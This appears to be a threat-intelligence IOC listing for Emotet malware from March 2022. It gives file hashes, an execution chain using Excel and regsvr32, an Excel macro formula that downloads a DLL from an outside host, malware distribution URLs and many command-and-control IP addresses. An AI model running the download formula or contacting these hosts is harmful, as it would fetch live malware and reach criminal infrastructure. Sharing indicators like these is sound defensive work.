e4_emotet_30.03.2022.txt

Emotet 2022 | epoch4 | 30.03.2022 | 

************************************************************************************************************

.xls 0629ED421025185F6D11AF39101C88CC6D6C1B3D6BF659238B5FB82AF185A9E3
.dll 14432d4da963edbcbfce46b0e739bec0d86ec6e2202f0700a09873a64c282deb

************************************************************************************************************

Exec >>

EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\2022-03-30_1251.xls

C:\Windows\SysWow64\regsvr32.exe -s ..\urtj.dll

C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Kcavz\rlwuik.idz"

************************************************************************************************************

https://www.gessersh.com/wp-includes/ZwQLepW/
https://www.fantasticmotion.jp/_cnskin/qfWEQrrwBg/
https://fcelik.nl/rittenregistratie/web/css/B3ILfU8Xk2SsEmT/
http://www.garantihaliyikama.com/wp-admin/FjgB6I/
http://dmcontabilidade.com/correspondentecaixa/TrS/
http://fanfield.co.uk/cgi-bin/7pp6DjWFNJXY8/

************************************************************************************************************

.zip 03BE6E921145B3B838041BD53CE0E542870F12762EF43496798E3C389BE458AD
.xls 47e3d200b4dedb791e44898fa7f81fc863beac90b663e9ba7639e3b0d8f49c64
.dll f06c3af6361f12b6024a31c5e1cb9c4b1ad45652b1b23843c9f3569b17a07f4e

************************************************************************************************************

Exec >>

EXCEL.EXE /dde C:\Users\Admin\AppData\Local\Temp\FILE_SC46J345FI1.xls

=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://dougveeder.com/cgi-bin/xJ91ZttGRioQ7IUL/", "..\hdrh.dll")

C:\Windows\SysWow64\regsvr32.exe -s ..\hdrh.dll

C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Zaxdcnwysxfobu\ginti.qsi

************************************************************************************************************

.dll distro

http://dougveeder.com/cgi-bin/xJ91ZttGRioQ7IUL/
http://dsinformaticos.com/_private/f36Yl/
http://fakecity.net/cache/XtIzhyLEoLI7/
https://e-fistik.com/ajax/PnA23/
http://dstny.net/cgi-bin/POqJKcxiIzRb/
http://fayeschmidt.com/cgi-bin/Q8pj6/	

http://fccatinsaat.com/wp-content/Cw3aR6792f/
http://freemanylaluz.com/downloads/8dR9pgNBFtz/
http://futaba.youchien.net/wp-content/sSJqJ/
http://fabulouswebdesign.net/invoice/m/
https://freewebsitedirectory.com/wp-includes/v2qFAlMZELRkxbz/
http://dominionai.org/wp-includes/T5qXAR8p5/

c2's

45.176.232.125:443
138.197.109.175:8080
187.84.80.182:443
79.143.187.147:443
189.232.46.161:443
103.70.28.102:8080
134.122.66.193:8080
151.106.112.196:8080
160.16.142.56:8080
212.24.98.99:8080
188.44.20.25:443
197.242.150.244:8080
206.189.28.199:8080
172.104.251.154:8080
103.43.46.182:443
203.114.109.124:443
103.75.201.2:443
58.227.42.236:80
201.94.166.162:443
189.126.111.200:7080
185.8.212.130:7080
167.99.115.35:8080
129.232.188.93:443
1.234.2.232:8080
153.126.146.25:7080
185.157.82.211:8080
131.100.24.231:80
1.234.21.73:7080
192.99.251.50:443
119.193.124.41:7080
159.8.59.82:8080
158.69.222.101:443
51.254.140.238:7080
5.9.116.246:8080
45.176.232.124:443
159.65.88.10:8080
101.50.0.91:8080
107.182.225.142:8080
167.172.253.162:8080
79.172.212.216:8080
50.30.40.196:8080
196.218.30.83:443
51.91.7.5:8080
212.237.17.99:8080
72.15.201.15:8080
183.111.227.137:8080
51.91.76.89:8080
209.250.246.206:443
176.104.106.96:8080
46.55.222.11:443
209.126.98.206:8080
164.68.99.3:8080
176.56.128.118:443
103.132.242.26:8080
110.232.117.186:8080
146.59.226.45:443
173.212.193.249:8080
82.165.152.127:8080
45.118.115.99:8080
216.158.226.206:443